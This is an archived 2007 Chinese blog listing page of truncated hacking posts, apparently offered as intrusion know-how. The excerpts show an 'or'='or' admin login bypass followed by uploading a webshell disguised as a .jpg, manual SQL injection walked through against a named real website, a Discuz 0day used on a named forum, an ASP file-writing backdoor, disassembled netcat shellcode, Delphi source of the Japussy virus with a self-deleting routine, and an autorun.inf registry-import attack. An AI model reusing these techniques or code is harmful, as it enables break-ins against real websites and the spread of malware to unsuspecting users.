加载中…
个人资料
小key
小key
  • 博客等级:
  • 博客积分:0
  • 博客访问:5,752
  • 关注人气:1
  • 获赠金笔:0支
  • 赠出金笔:0支
  • 荣誉徽章:
頭像
评论
加载中…
留言
加载中…
访客
加载中…
music
博文
标签:

知识/探索

分类: Hackerkey墮落
 企业网站都有自己的后台管理系统,而大多的中小企业因为管理疏忽,大部分都存在'or'='or'登陆漏洞。

  在网上搜索“企业网站后台管理系统”可以找到很多的登陆入口。

  我找了一个:http://www.******.com/manage/Login.asp 

  首先在用户名和密码都输入'or'='or',呵呵~可以进去,看了一下,上传图片和数据库备份都是可以使用的。首先我吧小马的后缀修改成.jpg的格式,在产品发布页面上传这个小马。成功了,看下图片的地址:UploadFiles/20061031102831512.jpg好了,可以去备份数据库了~呵呵~提示备份成功:“备份数据库成功,您备份的数据库路径为E

阅读  ┆ 评论  ┆ 转载 ┆ 收藏 
(2007-08-11 14:47)
标签:

知识/探索

分类: Hackerkey墮落
 

一 手动注入,知其然也知其所以然!
上次那个http://www.uesoft.cn/很多朋友都拿到了用户名和密码,但基本上都是用的各种各样的注入工具。
当然了,利用程序批量检测不失为一种省时省力的好办法。但是,我们提倡知其然也要知其所以然。不知道以前是听谁说的,只会依赖工具的人很难有新的提高!
我们不要当这样的人,我们也要知其所以然。
今天我们来说说如何注入。
就用这个网站吧!!www.uesoft.cn(已经是做出了很大的贡献了),随便找到一个新闻页面,比如这个新闻-----微软进军中国杀毒市场-----(http://www.uesoft.cn/News_Read.asp?Type_ID=3&ID=2361)

第一步,先检测此页面是否有注入点,两种方法。
1.在http://www.uesoft.cn/News_Read.asp?Type_ID=3&ID=2361后直接加个单引号 “ ' ”(不要把“”这个也输进去噢)
如果返回出错信息,就表示有注入点了。但是,此方法易于防范。提倡第2种方法。
2.在http://www.uesoft.cn/News_Read.asp?Type_ID=3&ID=2361后直接加上and 1=1看提示,如果没返回错误还是正常的页面的话就再在后面接着输入and 1=2
这时你发现页面内容没有了。出现一

阅读  ┆ 评论  ┆ 转载 ┆ 收藏 
标签:

知识/探索

分类: Hackerkey墮落
 

我不会编程,也不会入侵。更不会写文章。我就只知道遇事说事。

话说我有一域名,http://www.yylover.com(算是广告:),我以前做了一个网站不过感觉不好,所以我想改用BLOG程序。

我不喜欢大型BLOG程序,喜欢小型BLOG。所以去chinaz.com一搜,找到了一个合适自己的ASP—BLOG程序,本来想用PHP的,但是我的空间不支持PHP所以很让我恼火。我现在就用着它。这个BLOG名叫msmax blog,四川老乡开发的,用百度一搜就能找到一堆堆。

好了,步入正题。

1、过滤失败的检查,简单代码分析。

我们要入侵一个WEB站点首先要得其后台。所以,我们直接检查后台程序,如下:

 

不知道大家看到没有。

admin/login.asp(部分)

//**************************************************************

阅读  ┆ 评论  ┆ 转载 ┆ 收藏 
标签:

知识/探索

分类: Hackerkey墮落
 

安静的小E之PS:都怪我懒,呵呵,本来是给黑客X档案投稿的,因为懒惰就只写了利用过程没有写pm的漏洞分析,所以没有中标就发出来了!

想起07年03期的杂志首页《X档案“沦陷记”》中啊布和旭方的恶搞就觉得蛮有意思,可惜那个MD5不是完整的,被屏蔽掉了中间字符,如果想知道全部的MD5值该怎么办?想起这几天黑鹰基地,红狼安全小组,SEBUG全部被黑并转到TOM的BLOG,黑客动画吧是被糊涂虾改的首页,隐约在TOM的BLOG里听到糊涂虾的一句话:域名劫持。域名劫持并不是什么新技术,但是这个时代仿佛社会工程学是极其奏效的一种。既然如此,联想到欠钱大叔以前的兄弟先锋论坛,就去那里看看有没有什么有用的信息吧!

打开职业欠钱的兄弟先锋论坛http://xdxf.net,记得欠钱去X档案报道的时候偶尔会去逛逛,但忘记是什么论坛了,到了忽然发现Powered by Discuz! 5.0.0的信息(没记错的话以前是动网的),想起这几天DZ论坛的0day正火,就坏笑中……开工。

直接输入在地址栏输入:http://xdxf.net/stats.php?type=team,这个页面是团队信息,

阅读  ┆ 评论  ┆ 转载 ┆ 收藏 
分类: Hackerkey墮落
 
testfile=Server.MapPath('longker.txt')

msg=Request('msg')

set fs=server.CreateObject('scripting.filesystemobject')

set thisfile=fs.OpenTextFile(testfile,8,True,0)

thisfile.WriteLine(''&msg& '')

thisfile.close

set fs = nothing

阅读  ┆ 评论  ┆ 转载 ┆ 收藏 
分类: Hackerkey墮落
 [oyxin@OYXin shellcode]$ ndisasm -b 32 ncshellcode
00000000  EB33              jmp short 0x35
00000002  5E                pop esi
00000003  31C0              xor eax,eax
00000005  884607            mov [esi+0x7],al
00000008  88460A            mov [esi+0xa],al
0000000B  88460D            mov [esi+0xd],al
0000000E  884612            mov [esi+0x12],al
00000011  897613       
阅读  ┆ 评论  ┆ 转载 ┆ 收藏 
标签:

知识/探索

分类: Hackerkey墮落
 

一个典型的蠕虫病毒有两个功能型部件:传播和破坏,流行的蠕虫病毒大都是利用操作系统或者应用程序的漏洞(以弱口令和溢出最为常见),但常常并不会对宿主机造成“致命”的破坏。这两个特点使蠕虫病毒比普通电脑病毒传播得更快,影响力更大。一般来说,单一的蠕虫病毒只针对某种特定的漏洞进行攻击,所以一旦这种漏洞得到大范围修补,病毒也就没有了生存空间。

更新这种设计,我把传播部件拆分开来:把扫描、攻击和破坏脚本化,主程序则负责解析这些脚本。例如针对ftp弱口令进行扫描,我们可以定义如下脚本:

 

 code:

?/P>


            uid = iscript-0a21-2331-x #随机唯一编号

           
阅读  ┆ 评论  ┆ 转载 ┆ 收藏 
(2007-08-11 00:37)
标签:

知识/探索

分类: Hackerkey墮落
 

program japussy;

uses

windows, sysutils, classes, graphics, shellapi{, registry};

const

headersize = 82432;             //病毒体的大小

iconoffset = $12eb8;           //pe文件主图标的偏移量

//在我的delphi5 sp1上面编译得到的大小,其它版本的delphi可能不同

//查找2800000020的十六进制字符串可以找到主图标的偏移量

 

{

headersize = 38912;             //upx压缩过病毒体的大小

iconoffset = $92bc;             //upx压缩过pe文件主图标的偏移量

//upx 1.24w 用法: upx -9 --8086 japussy.exe

}

iconsize   = $2e8;             //pe文件主图标的大小--744

阅读  ┆ 评论  ┆ 转载 ┆ 收藏 
分类: Hackerkey墮落
 
procedure DeleteMe;

var

  BatchFile: TextFile;

  BatchFileName: string;

  ProcessInfo: TProcessInformation;

  StartUpInfo: TStartupInfo;

begin

  BatchFileName := ExtractFilePath(ParamStr(0)) '_deleteme.bat';

  AssignFile(BatchFile, BatchFileName);

  Rewrite(BatchFile);

  Writeln(BatchFile, ':try');

  Writeln(BatchFile, 'del '' ParamStr(0) ''');

  Writeln(BatchFile,

阅读  ┆ 评论  ┆ 转载 ┆ 收藏 
标签:

知识/探索

 

用自解压包删光别人的硬盘,相信大家都会。我给大家介绍个用自解压包入侵的方法。

如果捆绑一个木马给别人,只要稍有常识的人有杀毒软件就可以识破。如果不用木马,用些批处理炸弹、碎片对象文件、或自导入注册表文件,就可以实现各种攻击。

 

把以下两行保存为Autorun.inf

 

[Autorun]

open=regedit /s Autorun.reg

 

 

 

 

 



把以下一段保存为Autorun.reg

RE

阅读  ┆ 评论  ┆ 转载 ┆ 收藏 
  

新浪BLOG意见反馈留言板 电话:4000520066 提示音后按1键(按当地市话标准计费) 欢迎批评指正

新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 会员注册 | 产品答疑

新浪公司 版权所有